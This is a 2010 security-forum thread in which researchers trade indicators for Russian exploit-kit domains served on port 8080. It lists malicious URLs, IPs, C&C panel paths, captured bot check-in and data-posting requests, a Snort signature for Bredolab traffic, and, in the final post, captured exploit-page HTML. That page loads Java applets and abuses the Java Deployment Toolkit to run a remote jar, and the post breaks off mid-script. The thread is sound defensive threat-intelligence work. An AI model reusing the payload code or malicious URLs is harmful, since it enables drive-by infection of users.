Author Topic: .ru domains over port 8080  (Read 26253 times)

0 Members and 1 Guest are viewing this topic.

May 17, 2010, 07:21:35 pm
Read 26253 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.

188.165.61.44 - relaxedgrape.ru - 8080/TCP

Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php

PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js

Java:
http://relaxedgrape.ru:8080/Applet1.html



188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7

PDF:
http://rarephone.ru:8080/Notes7.pdf

Java:
http://rarephone.ru:8080/Applet7.html

Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503


174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503

May 17, 2010, 07:33:09 pm
Reply #1

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
188.165.192.22 - fewrocker.ru

Java:
http://fewrocker.ru:8080/Applet2.html

May 17, 2010, 07:37:51 pm
Reply #2

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
188.165.192.22 - fewrocker.ru

Code: [Select]
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php

May 17, 2010, 07:38:53 pm
Reply #3

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Couple more, I'll keep updating the thread as I find stuff:

greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6

May 17, 2010, 07:41:55 pm
Reply #4

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Bredolab I take it phillipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

May 17, 2010, 07:49:49 pm
Reply #5

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Bredolab I take it phillipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

BManager C&C Panel
Dont know if there is a connection to Bredolab though. Im not up-to-date at all :D

May 17, 2010, 07:58:49 pm
Reply #6

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
as far as i know BM is bredolab
Mal-Aware

May 17, 2010, 08:01:56 pm
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
Ruining the bad guy's day

May 17, 2010, 08:08:46 pm
Reply #8

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

yeah, noticed that too.
could be a none connected file, or even a file downloaded by bredolab
Mal-Aware

May 17, 2010, 08:27:38 pm
Reply #9

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
I see the binary posting data to
Code: [Select]
http://morechord.ru/home.php
Code: [Select]
VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks like base64 encoded.

Code: [Select]
# morechord.ru
Domain: morechord.ru
 Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
 RDNS:
 ASN: 49981 (NL)
IP: 217.20.47.85
 RDNS:
 ASN: 15830 (GB)
IP: 217.11.254.41
 RDNS: assigned-217-11-254-041.casablanca.cz
 ASN: 15685 (CZ)
IP: 88.191.47.83
 RDNS: sd-7664.dedibox.fr
 ASN: 12322 (FR)
IP: 217.148.89.77
 RDNS:
 ASN: 16237 (NL)

May 17, 2010, 08:30:07 pm
Reply #10

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
as far as i know BM is bredolab

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

What lead me to this nest of badness was a signature that fired for bredolab from that host. One from the VRT/Sourcefire guys the other from EmergingThreats.net both fired on a packet from this client system.

Request:
Code: [Select]
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660
HTTP/1.1
Host: bayjail.ru

Signature:
Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.

EDIT:

I thought bayjail.ru was already on the MDL, I guess it isn't and should be added.

Code: [Select]
#nslookup bayjail.ru

Non-authoritative answer:
Name:    bayjail.ru
Addresses:  88.191.47.83
          217.11.254.41
          217.20.47.85
          217.23.7.112
          217.148.89.77

May 17, 2010, 08:31:09 pm
Reply #11

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335

which looks like base64 encoded.


Noticed this too. Decoded string looks like an id.
Code: [Select]
Uid0::29DD04A6~~29DD04A6``29DD04A6
Ruining the bad guy's day

May 17, 2010, 08:56:39 pm
Reply #12

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--

May 17, 2010, 09:00:43 pm
Reply #13

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru
Server:  krusty.eid.doi.gov
Address:  10.10.2.3

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--

looks like an ftp stealer
Mal-Aware

May 17, 2010, 09:04:24 pm
Reply #14

matt

  • Newbie

  • Offline
  • *

  • 1
I'm not sure if these domains are on the mdl, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:

flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)

All of the requests are similar:

Code: [Select]
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
        var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
            o.launch(u);
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);